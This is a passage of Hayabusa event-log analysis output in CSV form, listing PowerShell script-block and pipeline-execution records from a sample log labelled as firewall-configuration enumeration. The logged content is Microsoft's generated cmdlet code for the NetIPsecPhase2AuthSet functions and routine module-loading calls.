'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] 
[Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] 
[ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] $",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings 
= 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value 
= $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
